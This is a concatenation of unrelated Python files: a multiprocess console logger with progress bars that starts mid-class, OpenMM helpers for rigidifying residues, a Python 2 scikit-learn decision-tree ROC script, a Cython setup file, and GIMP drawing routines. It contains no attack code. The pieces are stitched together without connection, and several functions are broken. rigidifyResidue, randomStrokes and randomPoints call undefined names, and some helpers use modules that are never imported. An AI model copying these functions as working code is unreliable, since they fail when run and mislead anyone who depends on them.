        self.decimals = decimals
        self.bar_length = bar_length

    def set_progress(self, progress):
        """
        Defines the current progress for this progress bar in iteration units (not percent).
        :param progress:    Current progress in iteration units regarding its total (not percent).
        :return:            True if the progress has changed. If the given progress is higher than the total or lower
                            than 0 then it will be ignored.
        """
        _progress = progress
        if _progress > self.total:
            _progress = self.total
        elif _progress < 0:
            _progress = 0

        # Stop task chrono if needed
        if _progress == self.total and self.display_time:
            self.end_time = time.time() * 1000

            # If the task has completed instantly then define its begin_time too
            if not self.begin_time:
                self.begin_time = self.end_time

        has_changed = self.progress != _progress

        if has_changed:
            self.progress = _progress

        return has_changed


class FancyLogger(object):
    """
    Defines a multiprocess logger object. Logger uses a redraw rate because of console flickering. That means it will
    not draw new messages or progress at the very time they are being logged but their timestamp will be captured at the
    right time. Logger will redraw at a given time period AND when new messages or progress are logged.
    If you still want to force redraw immediately (may produce flickering) then call 'flush' method.
    Logger uses one file handler and then uses standard output (stdout) to draw on screen.
    """

    queue = None
    "Handles all messages and progress to be sent to the logger process."

    default_message_number = 20
    "Default value for the logger configuration."
    default_exception_number = 5
    "Default value for the logger configuration."
    default_permanent_progressbar_slots = 0
    "Default value for the logger configuration."
    default_redraw_frequency_millis = 500
    "Default value for the logger configuration."
    default_level = logging.INFO
    "Default value for the logger configuration."
    default_task_millis_to_removal = 500
    "Default value for the logger configuration."
    default_console_format_strftime = '%d %B %Y %H:%M:%S'
    "Default value for the logger configuration."
    default_console_format = '{T} [{L}]'
    "Default value for the logger configuration."
    default_file_handlers = []
    "Default value for the logger configuration. Filled in constructor."

    def __init__(self,
                 message_number=default_message_number,
                 exception_number=default_exception_number,
                 permanent_progressbar_slots=default_permanent_progressbar_slots,
                 redraw_frequency_millis=default_redraw_frequency_millis,
                 console_level=default_level,
                 task_millis_to_removal=default_task_millis_to_removal,
                 console_format_strftime=default_console_format_strftime,
                 console_format=default_console_format,
                 file_handlers=None,
                 application_name=None):
        """
        Initializes a new logger and starts its process immediately using given configuration.
        :param message_number:              [Optional] Number of simultaneously displayed messages below progress bars.
        :param exception_number:            [Optional] Number of simultaneously displayed exceptions below messages.
        :param permanent_progressbar_slots: [Optional] The amount of vertical space (bar slots) to keep at all times,
                                            so the message logger will not move anymore if the bar number is equal or
                                            lower than this parameter.
        :param redraw_frequency_millis:     [Optional] Minimum time lapse in milliseconds between two redraws. It may be
                                            more because the redraw rate depends upon time AND method calls.
        :param console_level:               [Optional] The logging level (from standard logging module).
        :param task_millis_to_removal:      [Optional] Minimum time lapse in milliseconds at maximum completion before
                                            a progress bar is removed from display. The progress bar may vanish at a
                                            further time as the redraw rate depends upon time AND method calls.
        :param console_format_strftime:     [Optional] Specify the time format for console log lines using python
                                            strftime format. Defaults to format: '29 november 2016 21:52:12'.
        :param console_format:              [Optional] Specify the format of the console log lines. There are two
                                            variables available: {T} for timestamp, {L} for level. Will then add some
                                            tabulations in order to align text beginning for all levels.
                                            Defaults to format: '{T} [{L}]'
                                            Which will produce: '29 november 2016 21:52:12 [INFO]      my log text'
                                                                '29 november 2016 21:52:13 [WARNING]   my log text'
                                                                '29 november 2016 21:52:14 [DEBUG]     my log text'
        :param file_handlers:               [Optional] Specify the file handlers to use. Each file handler will use its
                                            own regular formatter and level. Console logging is distinct from file
                                            logging. Console logging uses custom stdout formatting, while file logging
                                            uses regular python logging rules. All handlers are permitted except
                                            StreamHandler if used with stdout or stderr which are reserved by this
                                            library for custom console output.
        :param application_name:            [Optional] Used only if 'file_handlers' parameter is ignored. Specifies the
                                            application name to use to format the default file logger using format:
                                            application_%Y-%m-%d_%H-%M-%S.log
        """
        super(FancyLogger, self).__init__()

        # Define default file handlers
        if not file_handlers:
            if not application_name:
                app_name = 'application'
            else:
                app_name = application_name

            handler = RotatingFileHandler(filename=os.path.join(os.getcwd(), '{}_{}.log'
                                                                .format(app_name, strftime('%Y-%m-%d_%H-%M-%S'))),
                                          encoding='utf8',
                                          maxBytes=5242880,  # 5 MB
                                          backupCount=10,
                                          delay=True)
            handler.setLevel(logging.INFO)
            handler.setFormatter(fmt=Formatter(fmt='%(asctime)s [%(levelname)s]\t%(message)s',
                                               datefmt=self.default_console_format_strftime))
            self.default_file_handlers.append(handler)

            file_handlers = self.default_file_handlers

        if not self.queue:
            self.queue = Queue()
            self.process = MultiprocessingLogger(queue=self.queue,
                                                 console_level=console_level,
                                                 message_number=message_number,
                                                 exception_number=exception_number,
                                                 permanent_progressbar_slots=permanent_progressbar_slots,
                                                 redraw_frequency_millis=redraw_frequency_millis,
                                                 task_millis_to_removal=task_millis_to_removal,
                                                 console_format_strftime=console_format_strftime,
                                                 console_format=console_format,
                                                 file_handlers=file_handlers)
            self.process.start()

    def flush(self):
        """
        Flushes the remaining messages and progress bars state by forcing redraw. Can be useful if you want to be sure
        that a message or progress has been updated in display at a given moment in code, like when you are exiting an
        application or doing some kind of synchronized operations.
        """
        self.queue.put(dill.dumps(FlushCommand()))

    def terminate(self):
        """
        Tells the logger process to exit immediately. If you do not call 'flush' method before, you may lose some
        messages of progresses that have not been displayed yet. This method blocks until logger process has stopped.
        """
        self.queue.put(dill.dumps(ExitCommand()))

        if self.process:
            self.process.join()

    def set_configuration(self,
                          message_number=default_message_number,
                          exception_number=default_exception_number,
                          permanent_progressbar_slots=default_permanent_progressbar_slots,
                          redraw_frequency_millis=default_redraw_frequency_millis,
                          console_level=default_level,
                          task_millis_to_removal=default_task_millis_to_removal,
                          console_format_strftime=default_console_format_strftime,
                          console_format=default_console_format,
                          file_handlers=default_file_handlers):
        """
        Defines the current configuration of the logger. Can be used at any moment during runtime to modify the logger
        behavior.
        :param message_number:              [Optional] Number of simultaneously displayed messages below progress bars.
        :param exception_number:            [Optional] Number of simultaneously displayed exceptions below messages.
        :param permanent_progressbar_slots: [Optional] The amount of vertical space (bar slots) to keep at all times,
                                            so the message logger will not move anymore if the bar number is equal or
                                            lower than this parameter.
        :param redraw_frequency_millis:     [Optional] Minimum time lapse in milliseconds between two redraws. It may be
                                            more because the redraw rate depends upon time AND method calls.
        :param console_level:               [Optional] The logging level (from standard logging module).
        :param task_millis_to_removal:      [Optional] Minimum time lapse in milliseconds at maximum completion before
                                            a progress bar is removed from display. The progress bar may vanish at a
                                            further time as the redraw rate depends upon time AND method calls.
        :param console_format_strftime:     [Optional] Specify the time format for console log lines using python
                                            strftime format. Defaults to format: '29 november 2016 21:52:12'.
        :param console_format:              [Optional] Specify the format of the console log lines. There are two
                                            variables available: {T} for timestamp, {L} for level. Will then add some
                                            tabulations in order to align text beginning for all levels.
                                            Defaults to format: '{T} [{L}]'
                                            Which will produce: '29 november 2016 21:52:12 [INFO]      my log text'
                                                                '29 november 2016 21:52:13 [WARNING]   my log text'
                                                                '29 november 2016 21:52:14 [DEBUG]     my log text'
        :param file_handlers:               [Optional] Specify the file handlers to use. Each file handler will use its
                                            own regular formatter and level. Console logging is distinct from file
                                            logging. Console logging uses custom stdout formatting, while file logging
                                            uses regular python logging rules. All handlers are permitted except
                                            StreamHandler if used with stdout or stderr which are reserved by this
                                            library for custom console output.
        """
        self.queue.put(dill.dumps(SetConfigurationCommand(task_millis_to_removal=task_millis_to_removal,
                                                          console_level=console_level,
                                                          permanent_progressbar_slots=permanent_progressbar_slots,
                                                          message_number=message_number,
                                                          exception_number=exception_number,
                                                          redraw_frequency_millis=redraw_frequency_millis,
                                                          console_format_strftime=console_format_strftime,
                                                          console_format=console_format,
                                                          file_handlers=file_handlers)))

    def set_level(self,
                  level,
                  console_only=False):
        """
        Defines the logging level (from standard logging module) for log messages.
        :param level:           Level of logging for the file logger.
        :param console_only:    [Optional] If True then the file logger will not be affected.
        """
        self.queue.put(dill.dumps(SetLevelCommand(level=level,
                                                  console_only=console_only)))

    def set_task_object(self,
                        task_id,
                        task_progress_object):
        """
        Defines a new progress bar with the given information using a TaskProgress object.
        :param task_id:                 Unique identifier for this progress bar. Will erase if already existing.
        :param task_progress_object:    TaskProgress object holding the progress bar information.
        """
        self.set_task(task_id=task_id,
                      total=task_progress_object.total,
                      prefix=task_progress_object.prefix,
                      suffix=task_progress_object.suffix,
                      decimals=task_progress_object.decimals,
                      bar_length=task_progress_object.bar_length,
                      keep_alive=task_progress_object.keep_alive,
                      display_time=task_progress_object.display_time)

    def set_task(self,
                 task_id,
                 total,
                 prefix,
                 suffix='',
                 decimals=0,
                 bar_length=60,
                 keep_alive=False,
                 display_time=False):
        """
        Defines a new progress bar with the given information.
        :param task_id:         Unique identifier for this progress bar. Will erase if already existing.
        :param total:           The total number of iteration for this progress bar.
        :param prefix:          The text that should be displayed at the left side of the progress bar. Note that
                                progress bars will always stay left-aligned at the shortest possible.
        :param suffix:          [Optional] The text that should be displayed at the very right side of the progress bar.
        :param decimals:        [Optional] The number of decimals to display for the percentage.
        :param bar_length:      [Optional] The graphical bar size displayed on screen. Unit is character.
        :param keep_alive:      [Optional] Specify whether the progress bar should stay displayed forever once completed
                                or if it should vanish.
        :param display_time:    [Optional] Specify whether the duration since the progress has begun should be
                                displayed. Running time will be displayed between parenthesis, whereas it will be
                                displayed between brackets when the progress has completed.
        """
        self.queue.put(dill.dumps(NewTaskCommand(task_id=task_id,
                                                 task=TaskProgress(total,
                                                                   prefix,
                                                                   suffix,
                                                                   decimals,
                                                                   bar_length,
                                                                   keep_alive,
                                                                   display_time))))

    def update(self,
               task_id,
               progress):
        """
        Defines the current progress for this progress bar id in iteration units (not percent).
        If the given id does not exist or the given progress is identical to the current, then does nothing.
        Logger uses a redraw rate because of console flickering. That means it will not draw new messages or progress
        at the very time they are being logged but their timestamp will be captured at the right time. Logger will
        redraw at a given time period AND when new messages or progress are logged. If you still want to force redraw
        immediately (may produce flickering) then call 'flush' method.
        :param task_id:     Unique identifier for this progress bar. Will erase if already existing.
        :param progress:    Current progress in iteration units regarding its total (not percent).
        """
        self.queue.put(dill.dumps(UpdateProgressCommand(task_id=task_id,
                                                        progress=progress)))

    def debug(self, text):
        """
        Posts a debug message adding a timestamp and logging level to it for both file and console handlers.
        Logger uses a redraw rate because of console flickering. That means it will not draw new messages or progress
        at the very time they are being logged but their timestamp will be captured at the right time. Logger will
        redraw at a given time period AND when new messages or progress are logged. If you still want to force redraw
        immediately (may produce flickering) then call 'flush' method.
        :param text: The text to log into file and console.
        """
        self.queue.put(dill.dumps(LogMessageCommand(text=text, level=logging.DEBUG)))

    def info(self, text):
        """
        Posts an info message adding a timestamp and logging level to it for both file and console handlers.
        Logger uses a redraw rate because of console flickering. That means it will not draw new messages or progress
        at the very time they are being logged but their timestamp will be captured at the right time. Logger will
        redraw at a given time period AND when new messages or progress are logged. If you still want to force redraw
        immediately (may produce flickering) then call 'flush' method.
        :param text: The text to log into file and console.
        """
        self.queue.put(dill.dumps(LogMessageCommand(text=text, level=logging.INFO)))

    def warning(self, text):
        """
        Posts a warning message adding a timestamp and logging level to it for both file and console handlers.
        Logger uses a redraw rate because of console flickering. That means it will not draw new messages or progress
        at the very time they are being logged but their timestamp will be captured at the right time. Logger will
        redraw at a given time period AND when new messages or progress are logged. If you still want to force redraw
        immediately (may produce flickering) then call 'flush' method.
        :param text: The text to log into file and console.
        """
        self.queue.put(dill.dumps(LogMessageCommand(text=text, level=logging.WARNING)))

    def error(self, text):
        """
        Posts an error message adding a timestamp and logging level to it for both file and console handlers.
        Logger uses a redraw rate because of console flickering. That means it will not draw new messages or progress
        at the very time they are being logged but their timestamp will be captured at the right time. Logger will
        redraw at a given time period AND when new messages or progress are logged. If you still want to force redraw
        immediately (may produce flickering) then call 'flush' method.
        :param text: The text to log into file and console.
        """
        self.queue.put(dill.dumps(LogMessageCommand(text=text, level=logging.ERROR)))

    def critical(self, text):
        """
        Posts a critical message adding a timestamp and logging level to it for both file and console handlers.
        Logger uses a redraw rate because of console flickering. That means it will not draw new messages or progress
        at the very time they are being logged but their timestamp will be captured at the right time. Logger will
        redraw at a given time period AND when new messages or progress are logged. If you still want to force redraw
        immediately (may produce flickering) then call 'flush' method.
        :param text: The text to log into file and console.
        """
        self.queue.put(dill.dumps(LogMessageCommand(text=text, level=logging.CRITICAL)))

    def throw(self, stacktrace, process_title=None):
        """
        Sends an exception to the logger so it can display it as a special message. Prevents console refresh cycles from
        hiding exceptions that could be thrown by processes.
        :param stacktrace:      Stacktrace string as returned by 'traceback.format_exc()' in an 'except' block.
        :param process_title:   [Optional] Define the current process title to display into the logger for this
                                exception.
        """
        self.queue.put(dill.dumps(StacktraceCommand(pid=os.getpid(),
                                                    stacktrace=stacktrace,
                                                    process_title=process_title)))

    # --------------------------------------------------------------------
    # Iterator implementation
    def progress(self,
                 enumerable,
                 task_progress_object=None):
        """
        Enables the object to be used as an iterator. Each iteration will produce a progress update in the logger.
        :param enumerable:              Collection to iterate over.
        :param task_progress_object:    [Optional] TaskProgress object holding the progress bar information.
        :return:                        The logger instance.
        """
        self.list = enumerable
        self.list_length = len(enumerable)
        self.task_id = uuid.uuid4()
        self.index = 0

        if task_progress_object:
            # Force total attribute
            task_progress_object.total = self.list_length
        else:
            task_progress_object = TaskProgress(total=self.list_length,
                                                display_time=True,
                                                prefix='Progress')

        # Create a task progress
        self.set_task_object(task_id=self.task_id,
                             task_progress_object=task_progress_object)

        return self

    def __iter__(self):
        """
        Enables the object to be used as an iterator. Each iteration will produce a progress update in the logger.
        :return: The logger instance.
        """
        return self

    def __next__(self):
        """
        Enables the object to be used as an iterator. Each iteration will produce a progress update in the logger.
        :return: The current object of the iterator.
        """
        if self.index >= self.list_length:
            raise StopIteration
        else:
            self.index += 1
            self.update(task_id=self.task_id,
                        progress=self.index)

            return self.list[self.index - 1]
    # ---------------------------------------------------------------------

from simtk.openmm import app
import simtk.openmm as mm
from simtk import unit

def findForce(system, forcetype, add=True):
  """ Finds a specific force in the system force list - added if not found."""
  for force in system.getForces():
    if isinstance(force, forcetype):
      return force
  if add==True:
    system.addForce(forcetype())
    return findForce(system, forcetype)
  return None

def setGlobalForceParameter(force, key, value):
  for i in range(force.getNumGlobalParameters()):
    if force.getGlobalParameterName(i)==key:
      print('setting force parameter', key, '=', value)
      force.setGlobalParameterDefaultValue(i, value);

def atomIndexInResidue(residue):
  """ list of atom index in residue """
  index=[]
  for a in list(residue.atoms()):
    index.append(a.index)
  return index

def getResiduePositions(residue, positions):
  """ Returns array w. atomic positions of residue """
  ndx = atomIndexInResidue(residue)
  return np.array(positions)[ndx]

def uniquePairs(index):
  """ list of unique, internal pairs """
  return list(combinations( range(index[0],index[-1]+1),2 ) )

def addHarmonicConstraint(harmonicforce, pairlist, positions, threshold, k):
  """ add harmonic bonds between pairs if distance is smaller than threshold """
  print('Constraint force constant =', k)
  for i,j in pairlist:
    distance = unit.norm( positions[i]-positions[j] )
    if distance<threshold:
      harmonicforce.addBond( i,j,
          distance.value_in_unit(unit.nanometer),
          k.value_in_unit( unit.kilojoule/unit.nanometer**2/unit.mole ))
      print("added harmonic bond between", i, j, 'with distance',distance)

def addExclusions(nonbondedforce, pairlist):
  """ add nonbonded exclusions between pairs """
  for i,j in pairlist:
    nonbondedforce.addExclusion(i,j)

def rigidifyResidue(residue, harmonicforce, positions, nonbondedforce=None,
    threshold=6.0*unit.angstrom, k=2500*unit.kilojoule/unit.nanometer**2/unit.mole):
  """ make residue rigid by adding constraints and nonbonded exclusions """
  index    = atomIndexInResidue(residue)
  pairlist = uniquePairs(index)
  addHarmonicConstraint(harmonic, pairlist, pdb.positions, threshold, k)
  if nonbondedforce is not None:
    for i,j in pairlist:
      print('added nonbonded exclusion between', i, j)
      nonbonded.addExclusion(i,j)


from array import array

import numpy as np
import matplotlib.pyplot as plt

from sklearn import datasets
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import AdaBoostClassifier
from sklearn.metrics import classification_report, roc_auc_score, roc_curve

from sklearn import tree
import cPickle

data = np.load('/Users/musthero/Documents/Yura/Applications/tmva_local/output_electrons_fullsim_v5_VeryTightLH_20per.npz')

# Train on the first 2000, test on the rest
X_train, y_train = data['data_training'], data['isprompt_training'].ravel()
X_test, y_test = data['data_testing'][0:1000], data['isprompt_testing'][0:1000].ravel()

# sklearn
dt = DecisionTreeClassifier(max_depth=3,
                            min_samples_leaf=100)
                            #min_samples_leaf=0.05*len(X_train))

doFit = False

if doFit:
    print "Performing DecisionTree fit..."
    dt.fit(X_train, y_train)

    import cPickle
    with open('electrons_toTMVA.pkl', 'wb') as fid:
        cPickle.dump(dt, fid)
else:
    print "Loading DecisionTree..."
    # load it again
    with open('electrons_toTMVA.pkl', 'rb') as fid:
        dt = cPickle.load(fid)

#sk_y_predicted = dt.predict(X_test)
#sk_y_predicted = dt.predict_proba(X_test)[:, 1]
sk_y_predicted = dt.predict_proba(X_test)[:, 1]
predictions = dt.predict(X_test)
print predictions
print y_test


# Draw ROC curve
fpr, tpr, _ = roc_curve(y_test, sk_y_predicted)

plt.figure()
plt.plot(fpr, tpr, label='ROC curve of class')

plt.plot([0, 1], [0, 1], 'k--')
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('Some extension of Receiver operating characteristic to multi-class')
plt.legend(loc="lower right")

plt.savefig("output_fullsim_v5_electrons_roc_20per_DecisionTree.png", dpi=144)

tree.export_graphviz(dt, out_file='dt_viz.dot')

# Save to file fpr, tpr
#np.savez('output_fullsim_v3_electrons_fpr_tpr_10per.npz', 
#    fpr=fpr, tpr=tpr)
# coding=utf-8
from setuptools import setup
from Cython.Build import cythonize

setup(
    name="cyfib",
    ext_modules=cythonize('cyfib.pyx', compiler_directives={'embedsignature': True}),
)

import random, math
import gimp_be
#from gimp_be.utils.quick import qL
from gimp_be.image.layer import editLayerMask
from effects import mirror
import numpy as np
import UndrawnTurtle as turtle

def brushSize(size=-1):
    """"
    Set brush size
    """
    image = gimp_be.gimp.image_list()[0]
    drawable = gimp_be.pdb.gimp_image_active_drawable(image)
    if size < 1:
        size = random.randrange(2, ((image.height + image.width) / 8))
    gimp_be.pdb.gimp_context_set_brush_size(size)

# Set brush opacity
def brushOpacity(op=-1):
    if op == -1:
        op = random.randrange(15, 100)
    gimp_be.pdb.gimp_brushes_set_opacity(op)
    return op

# Set random brush color no parameters set random
def brushColor(r1=-1, g1=-1, b1=-1, r2=-1, g2=-1, b2=-1):
    if not r1 == -1:
        gimp_be.pdb.gimp_context_set_foreground((r1, g1, b1))
    if not r2 == -1:
        gimp_be.pdb.gimp_context_set_background((r2, g2, b2))
    elif r1 == -1:
        r1 = random.randrange(0, 255)
        g1 = random.randrange(0, 255)
        b1 = random.randrange(0, 255)
        r2 = random.randrange(0, 255)
        g2 = random.randrange(0, 255)
        b2 = random.randrange(0, 255)
        gimp_be.pdb.gimp_context_set_foreground((r1, g1, b1))
        gimp_be.pdb.gimp_context_set_background((r2, g2, b2))
    return (r1, g1, b1, r2, g2, b2)

#set gray scale color
def grayColor(gray_color):
    gimp_be.pdb.gimp_context_set_foreground((gray_color, gray_color, gray_color))

# Set random brush
def randomBrush():
    num_brushes, brush_list = gimp_be.pdb.gimp_brushes_get_list('')
    brush_pick = brush_list[random.randrange(0, len(brush_list))]
    gimp_be.pdb.gimp_brushes_set_brush(brush_pick)
    return brush_pick

# Set random brush dynamics
def randomDynamics():
    dynamics_pick = random.choice(gimp_be.pdb.gimp_dynamics_get_list('')[1])
    gimp_be.pdb.gimp_context_set_dynamics(dynamics_pick)
    return dynamics_pick

def qL():
    # quick new layer
    gimp_be.addNewLayer()
    image = gimp_be.gimp.image_list()[0]
    drawable = gimp_be.pdb.gimp_image_active_drawable(image)
    gimp_be.pdb.gimp_edit_fill(drawable, 1)

def drawLine(points):
    image = gimp_be.gimp.image_list()[0]
    drawable = gimp_be.pdb.gimp_image_active_drawable(image)
    gimp_be.pdb.gimp_paintbrush_default(drawable, len(points), points)

def drawSpiral(n=140, angle=61, step=10, center=[]):
    coord=[]
    nt=turtle.Turtle()
    if center == []:
        image = gimp_be.gimp.image_list()[0]
        center=[image.width/2,image.height/2]
    for step in range(n):
        coord.append(int(nt.position()[0]*10)+center[0])
        coord.append(int(nt.position()[1]*10)+center[1])
        nt.forward(step)
        nt.left(angle)
        coord.append(int(nt.position()[0]*10)+center[0])
        coord.append(int(nt.position()[1]*10)+center[1])
    drawLine(coord)

def drawRays(rays=32, rayLength=100, centerX=0, centerY=0):
    """"
    draw N rays from center in active drawable with current brush
    """
    image = gimp_be.gimp.image_list()[0]
    drawable = gimp_be.pdb.gimp_image_active_drawable(image)
    if centerX == 0:
        centerX = image.width/2
    if centerY == 0:
        centerY = image.height/2
    ray_gap = int(360.0/rays)
    for ray in range(0,rays):
        ctrlPoints = centerX, centerY, centerX + rayLength * math.sin(math.radians(ray*ray_gap)), centerY + rayLength * math.cos(math.radians(ray*ray_gap))
        drawLine(ctrlPoints)

def drawRandomRays(rays=32, length=100, centerX=0, centerY=0,noise=0.3):
    image = gimp_be.gimp.image_list()[0]
    drawable = gimp_be.pdb.gimp_image_active_drawable(image)
    if centerX == 0:
        centerX = image.width/2
    if centerY == 0:
        centerY = image.height/2
    ray_gap = 360.0/rays
    for ray in range(0,rays):
        rayLength=random.choice(range(int(length-length*noise),int(length+length*noise)))
        random_angle=random.choice(np.arange(0.0,360.0,0.01))
        ctrlPoints = [ centerX, centerY, centerX + int(rayLength * math.sin(math.radians(random_angle))), int(centerY + rayLength * math.cos(math.radians(random_angle)))]
        drawLine(ctrlPoints)

def spikeBallStack(depth=20, layer_mode=6, flatten=0):
    for x in range(1,depth):
        image = gimp_be.gimp.image_list()[0]
        drawable = gimp_be.pdb.gimp_image_active_drawable(image)
        qL()
        gimp_be.pdb.gimp_layer_set_mode(gimp_be.pdb.gimp_image_get_active_layer(image), layer_mode)
        drawRandomRays(rays=random.choice([32,64,128,4]), length=(image.height/2-image.height/12), centerX=image.width/2, centerY=image.height/2,noise=random.choice([0.3,0.1,0.8]))
        if flatten:
            if not x%flatten:
                gimp_be.pdb.gimp_image_flatten(image)

def randomStrokes(num = 4, opt = 1):
    """
    Draw random strokes of random size and random position
    """
    image = gimp_be.gimp.image_list()[0]
    drawable = gimp_be.pdb.gimp_image_active_drawable(image)
    r = random.randrange
    for loopNum in range(0, num):
        if opt == 1:
            brushSize(35)
        drawLine(ctrlPoints)

# draw random color bars, opt 3 uses random blend
def drawBars(barNum=10, opt=3):
    image = gimp_be.gimp.image_list()[0]
    drawable = gimp_be.pdb.gimp_image_active_drawable(image)
    barWidth =image.width/ barNum
    barLeft = 0
    color = -1
    for loopNum in range(0, barNum):
        gimp_be.pdb.gimp_image_select_rectangle(image, 2, barLeft, 0, barWidth, image.height)
        barLeft = barLeft + barWidth
        if opt == 3:
            randomBlend()
        elif opt == 2:
            color = brushColor()
            gimp_be.pdb.gimp_edit_bucket_fill_full(drawable, 0, 0, 100, 0, 1, 0, gimp_be.SELECT_CRITERION_COMPOSITE, 0, 0)
        else:
            gimp_be.pdb.gimp_edit_bucket_fill_full(drawable, 0, 0, 100, 0, 1, 0, gimp_be.SELECT_CRITERION_COMPOSITE, 0, 0)
    gimp_be.pdb.gimp_selection_none(image)
    return (barNum, opt, color)

# draw carbon nano tube
def drawCNT():
    image = gimp_be.gimp.image_list()[0]
    drawable = gimp_be.pdb.gimp_image_active_drawable(image)
    drawSinWave(1, 4, image.height * .42, 0, image.height / 2)
    gimp_be.pdb.gimp_paintbrush(drawable, 0, 4, (0, (image.height - 80),image.width, (image.height - 80)), 0, 0)
    gimp_be.pdb.gimp_paintbrush(drawable, 0, 4, (0, 80,image.width, 80), 0, 0)

# draw sine wave
def drawSinWave(bar_space=32, bar_length=-1, mag=70, x_offset=-1, y_offset=-1):
    image = gimp_be.gimp.image_list()[0]
    if y_offset == -1:
        y_offset = image.height/2
    if x_offset == -1:
        x_offset = 0
    if bar_length == -1:
        bar_length = image.height/6
    steps = image.width / bar_space
    x = 0
    for cStep in range(0, steps):
        x = cStep * bar_space + x_offset
        y = int(round(math.sin(x) * mag) + y_offset)
        ctrlPoints = x, int(y - round(bar_length / 2)), x, int(y + round(bar_length / 2))
        drawLine(ctrlPoints)

# draw sine wave
def drawSinWaveDouble(barSpace, barLen, mag):
    image = gimp_be.gimp.image_list()[0]
    steps =image.width/ barSpace
    x = 0
    for cStep in range(1, steps):
        x = cStep * barSpace
        y = int(abs(round(math.sin(x) * mag + image.height / 2)))
        ctrlPoints = x, int(y - round(barLen / 2)), x, int(y + round(barLen / 2))
        drawLine(ctrlPoints)

# draw a single brush point
def drawBrush(x1, y1):
    image = gimp_be.gimp.image_list()[0]
    drawable = gimp_be.pdb.gimp_image_active_drawable(image)
    ctrlPoints = (x1, y1, x1, y1)
    drawLine(ctrlPoints)

# draw multiple brush points
def drawMultiBrush(brush_strokes=24):
    image = gimp_be.gimp.image_list()[0]
    grid_width=image.width/int(math.sqrt(brush_strokes))
    grid_height=image.height/int(math.sqrt(brush_strokes))
    coord_x=0
    coord_y = 0
    for i in range(0, int(math.sqrt(brush_strokes))):
        coord_x = coord_x + grid_width
        for x in range(0, int(math.sqrt(brush_strokes))):
            coord_y = coord_y + grid_height
            drawBrush(coord_x, coord_y)
        coord_y = 0

#draw grid of dots, this is for remainder mapping, this incomplete and temp. ####====DONT FORGET
def dotGrid():
    image = gimp_be.gimp.image_list()[0]
    drawable = gimp_be.pdb.gimp_image_active_drawable(image)
    for i in range(10,image.width-10,20):
        for x in range(10, image.height-10,20):
            grayColor(abs(i^3-x^3)%256)
            drawBrush(i+10,x+10)

# draws random dots, opt  does random color
def randomCircleFill(num=20, size=100, opt=3, sq=1):
    image = gimp_be.gimp.image_list()[0]
    drawable = gimp_be.pdb.gimp_image_active_drawable(image)
    for loopNum in range(0, num):
        cirPar = [random.randrange(0,image.width), random.randrange(0, image.height), random.randrange(10, size),
                  random.randrange(10, size)]
        if opt % 2 == 0:
            brushColor()
        if sq:
            gimp_be.pdb.gimp_ellipse_select(image, cirPar[0], cirPar[1], cirPar[2], cirPar[2], 2, 1, 0, 0)
        else:
            gimp_be.pdb.gimp_ellipse_select(image, cirPar[0], cirPar[1], cirPar[2], cirPar[3], 2, 1, 0, 0)
        if opt % 3 == 3:
            randomBlend()
        else:
            gimp_be.pdb.gimp_edit_bucket_fill_full(drawable, 0, 0, 100, 0, 1, 0, gimp_be.SELECT_CRITERION_COMPOSITE, 0, 0)
    gimp_be.pdb.gimp_selection_none(image)

def randomRectFill(num=20, size=100, opt=3, sq=0):
    # draws square, opt  does random color
    image = gimp_be.gimp.image_list()[0]
    drawable = gimp_be.pdb.gimp_image_active_drawable(image)
    selectMode = 2
    if opt % 5 == 0:
        selectMode = 0
    for loopNum in range(0, num):
        if opt % 2 == 0:
            brushColor()
        rectPar = [random.randrange(0,image.width), random.randrange(0, image.height), random.randrange(10, size),
                   random.randrange(10, size)]
        if sq:
            gimp_be.pdb.gimp_image_select_rectangle(image, 2, rectPar[0], rectPar[1], rectPar[2], rectPar[2])
        else:
            gimp_be.pdb.gimp_image_select_rectangle(image, 2, rectPar[0], rectPar[1], rectPar[2], rectPar[3])
        if opt % 3 == 0:
            randomBlend()
        else:
            gimp_be.pdb.gimp_edit_bucket_fill_full(drawable, 0, 0, 100, 0, 1, 0, gimp_be.SELECT_CRITERION_COMPOSITE, 0, 0)
    gimp_be.pdb.gimp_selection_none(image)

def randomBlend():
    # Random Blend tool test
    blend_mode = 0
    paint_mode = 0
    gradient_type = random.randrange(0, 10)
    opacity = random.randrange(20, 100)
    offset = 0
    repeat = random.randrange(0, 2)
    reverse = 0
    supersample = 0
    max_depth = random.randrange(1, 9)
    threshold = 0
    threshold = random.randrange(0, 1)
    dither = 0
    image = gimp_be.gimp.image_list()[0]
    drawable = gimp_be.pdb.gimp_image_active_drawable(image)
    brushColor()
    x1 = random.randrange(0,image.width)
    y1 = random.randrange(0, image.height)
    x2 = random.randrange(0,image.width)
    y2 = random.randrange(0, image.height)
    gimp_be.pdb.gimp_blend(drawable, blend_mode, paint_mode, gradient_type, opacity, offset, repeat, reverse, supersample, max_depth, threshold, dither, x1, y1, x2, y2)

def randomPoints(num=12):
    d = []
    for x in range(num):
        d.append(choice(range(boarder,image.width-boarder)))
        d.append(choice(range(boarder,image.height-boarder)))
    return d

def drawInkBlot(option=''):
    image=gimp_be.gimp.image_list()[0]
    layer=gimp_be.pdb.gimp_image_get_active_layer(image)
    if 'trippy' in option:
        layer_copy = gimp_be.pdb.gimp_layer_copy(layer, 0)
        gimp_be.pdb.gimp_image_add_layer(image, layer_copy,1)
        randomBlend()
        mask = gimp_be.pdb.gimp_layer_create_mask(layer,5)
        gimp_be.pdb.gimp_image_add_layer_mask(image, layer,mask)
        editLayerMask(1)
    randomCircleFill(num=15,size=800)
    brushColor(255,255,255)
    randomCircleFill(num=50,size=100)
    randomCircleFill(num=5,size=300)
    brushColor(0)
    randomCircleFill(num=20,size=600)
    randomCircleFill(num=50,size=400)
    randomCircleFill(num=100,size=100)
    brushColor(255,255,255)
    randomCircleFill(num=50,size=100)
    brushColor(0)
    drawable = gimp_be.pdb.gimp_image_active_drawable(image)
    brushSize()
    strokes=[random.randrange(0,image.width/2),random.randrange(0,image.height),random.randrange(0,image.width/2),random.randrange(0,image.height)]
    gimp_be.pdb.gimp_smudge(drawable, random.choice([1,5,10,50,100]), len(strokes), strokes)
    brushSize()
    strokes=[random.randrange(0,image.width/2),random.randrange(0,image.height),random.randrange(0,image.width/2),random.randrange(0,image.height)]
    gimp_be.pdb.gimp_smudge(drawable, random.choice([1,5,10,50,100]), len(strokes), strokes)
    mirror('h')
    if 'trippy' in option and random.choice([0,1]):
        drawable = gimp_be.pdb.gimp_image_active_drawable(image)
        gimp_be.pdb.gimp_invert(drawable)
        editLayerMask(0)

